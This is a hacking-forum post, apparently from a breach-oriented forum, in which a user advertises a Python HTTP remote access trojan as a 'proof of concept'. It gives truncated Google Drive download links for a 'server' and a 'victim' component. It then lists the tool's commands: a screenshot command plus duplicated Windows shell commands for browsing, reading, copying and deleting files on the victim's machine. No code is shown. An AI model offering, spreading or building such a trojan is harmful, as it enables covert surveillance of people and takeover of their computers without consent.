06-30-2024, 03:14 PM
(This post was last modified: 06-30-2024, 03:27 PM by PulseCipher.)
Hey Breachers,
I know many of you have been having trouble finding a good HTTP RAT. Today, I'm excited to present my proof of concept for an HTTP RAT in python:
server - https://drive.google.com/file/d/1qPCz-dT...drive_link
victim - https://drive.google.com/file/d/1I1FD9dN...drive_link
server - https://drive.google.com/file/d/1qPCz-dT...drive_link
victim - https://drive.google.com/file/d/1I1FD9dN...drive_link
COMMANDS:
.screenshot (take a screenshot)
______________________________________________________________________________
cls - Clears the screen.
dir - Lists files and directories in the current directory.
cd - Changes the current directory.
cd foldername - Moves to the specified directory.
cd .. - Moves up one directory level.
copy source destination - Copies files from one location to another.
move source destination - Moves files from one location to another.
del filename - Deletes a specified file.
md foldername - Creates a new directory (folder).
rd foldername - Removes a directory (folder).
ren oldname newname - Renames a file or directory.
type filename - Displays the contents of a text file.
echo text - Displays messages or turns on/off command echoing.
exit - Closes the Command Prompt window.
cls - Clears the screen.
dir - Lists files and directories in the current directory.
cd - Changes the current directory.
cd foldername - Moves to the specified directory.
cd .. - Moves up one directory level.
copy source destination - Copies files from one location to another.
move source destination - Moves files from one location to another.
del filename - Deletes a specified file.
md foldername - Creates a new directory (folder).
rd foldername - Removes a directory (folder).
ren oldname newname - Renames a file or directory.
type filename - Displays the contents of a text file.
echo text - Displays messages or turns on/off command echoing.
exit - Closes the Command Prompt window.
______________________________________________________________________________